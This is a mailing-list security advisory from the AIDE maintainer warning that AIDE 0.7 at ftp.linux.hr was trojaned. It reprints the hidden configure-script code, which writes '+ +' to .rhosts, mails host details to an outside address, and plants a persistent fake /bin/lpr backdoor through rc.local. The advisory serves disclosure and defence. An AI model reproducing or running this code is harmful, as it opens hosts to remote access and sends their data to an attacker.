Trojan in Aide distribution at ftp.linux.hr

[Rami Lehti <Rami.Lehti () finland sun com>]

It has come my attention that there has been a trojaned 
Aide distribution at ftp://ftp.linux.hr/pub/aide
The offending binary has been removed.
Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to 
download it from ftp://ftp.cs.tut.fi/pub/src/gnu
and always check the PGP signature before using any distribution of
Aide.

The trojaned distribution contains the following script embedded in
the configure script. As you can see it tries to add "+ +" to roots
.rhosts and sends information about your host to l4m0r () freebox com


# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi

And later on:
if [ $root_user != "1" ];then 
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >
> /tmp/jea
mail l4m0r () freebox com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0r () freebox com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
fi



Rami Lehti
-- 
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com